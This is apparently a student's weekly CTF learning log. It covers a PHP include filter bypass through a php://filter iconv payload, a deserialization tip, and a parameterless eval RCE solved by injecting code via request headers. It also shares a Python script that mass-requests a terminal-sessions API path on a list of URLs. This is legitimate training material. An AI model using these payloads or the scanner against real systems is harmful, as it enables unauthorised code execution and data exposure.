<a name="eMai1"></a>
## 本周内容
1.初步认识了XSS，在dvwa做题<br />2.复现了buu的一些题<br />3.继续写开源情报<br />4.出题<br />5.准备期中考
<a name="VTTPg"></a>
## 成果展示
<a name="TA6vQ"></a>
### 1.include过滤了base和rot
```php
<?php
  highlight_file(__FILE__);
// FLAG in the flag.php
$file = $_GET['file'];
if(isset($file) && !preg_match('/base|rot/i',$file)){
  @include($file);
}else{
  die("nope");
}
```
可以用convert.iconv.utf-8.utf-7和utf-8转换成为utf-7<br />payload：?file=php://filter/convert.iconv.utf-8.utf-7/resource=flag.php<br />顺遍新学了一个新方法string.strip_tags|convert.base64-decode/resource=可以用于死亡绕过![95b61469385895.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1700130797341-2abd2ffb-3514-412d-9219-9d71bb75d991.png#averageHue=%23282822&clientId=u70663b78-4a54-4&from=drop&id=ua574dd37&originHeight=896&originWidth=1368&originalType=binary&ratio=1.75&rotation=0&showTitle=false&size=78606&status=done&style=none&taskId=u6d200c2d-00ea-45f9-812c-e734cafe6b3&title=)
<a name="gZByc"></a>
### 2.反序列化
死磕一道题半天才知道反序列化的echo需要urlencode()，不然会有一些字符被略过了...<br />![image.png](https://cdn.nlark.com/yuque/0/2023/png/39135006/1700137442034-cb27272d-4def-474b-9c90-4adc351bbefd.png#averageHue=%23a49062&clientId=u70663b78-4a54-4&from=paste&height=536&id=u061e4e7f&originHeight=1408&originWidth=2568&originalType=binary&ratio=1.75&rotation=0&showTitle=false&size=312234&status=done&style=none&taskId=u9d5f75d1-785b-4dbd-a850-ce3aa6d83db&title=&width=978.2857142857143)
<a name="DDnhm"></a>
### 3.RCE
/[^\W]+\((?R)?\)/<br />\W 元字符用于查找非单词字符。<br />单词字符包括：a-z、A-Z、0-9，以及下划线。<br />故[^\W]可以匹配所有单词字符<br />+表示可以匹配一个或多个<br />\(和\)为左右括号<br />(?R)?表示递归整个模式<br />所以只能写成a(b(c()))这种形式，而不能为a('xxx')的形式，为无参数[**RCE**](https://so.csdn.net/so/search?q=RCE&spm=1001.2101.3001.7020)****getallheaders()可以数组查看头信息**
```php
<?php
highlight_file(__FILE__);
if (';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['star'])) {
if(!preg_match('/high|get_defined_vars|scandir|var_dump|read|file|php|curent|end/i',$_GET['star'])){
eval($_GET['star']);
}
} 
```
**?star=eval(next(getallheaders()));**<br />**考察了更改headers来执行eval**
<a name="HJQTQ"></a>
### 4.开源情报自己写脚本
刚开始整这个玩意还真不会整<br />后来和老师聊了2个小时终于弄会了<br />分享一个千辛万苦写出来的一个扫描api的脚本
```python
import os
import asyncio
import aiohttp
from urllib.parse import urlparse
from pyppeteer import launch
from pyppeteer.errors import NetworkError


url_file = 'output.txt'
with open(url_file, 'r') as file:
    url_list = file.readlines()

url_list = [url.strip() for url in url_list]

output_dir = 'responses'
os.makedirs(output_dir, exist_ok=True)

async def fetch(session, url):
    try:
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36'
        }

        modified_url = url.rstrip('/') + '/api/v1/terminal/sessions/'
        async with session.get(modified_url, headers=headers, ssl=False, timeout=5) as response:
            content = await response.text()
        parsed_url = urlparse(url)
        host = parsed_url.netloc.split(':')[0]  
        port = parsed_url.netloc.split(':')[1] if len(parsed_url.netloc.split(':')) > 1 else '80'  

        output_file = os.path.join(output_dir, f'{host}_{port}.html')

        with open(output_file, 'w', encoding='utf-8') as file:
            file.write(content)

        print(f'Response for URL {url} saved to {output_file}')
    except aiohttp.ClientError as e:
        print(f'Error for URL {url}: {str(e)}, fetching next URL...')

async def main():
    async with aiohttp.ClientSession() as session:
        tasks = []
        for url in url_list:
            task = asyncio.ensure_future(fetch(session, url))
            tasks.append(task)

        await asyncio.gather(*tasks)

loop = asyncio.get_event_loop()
loop.run_until_complete(main())

```
还有各种各样的脚本写的秃头，表格转换，连接提取之类的...<br />5.XSS还只是入门，还没搞出什么名堂，下周学出来了再写o.o
<a name="X0sUh"></a>
## 心得：
这周期中考试一过应该就可以闲下来了好好搞了，最近加了开源情报之后明显CTF的学习进度就慢下来而且有点乱，下周的计划是把XSS再学学，然后学Pyjail准备一下中期考核。这周最后还看到了pearcmd，下周有时间的话再学学这个。
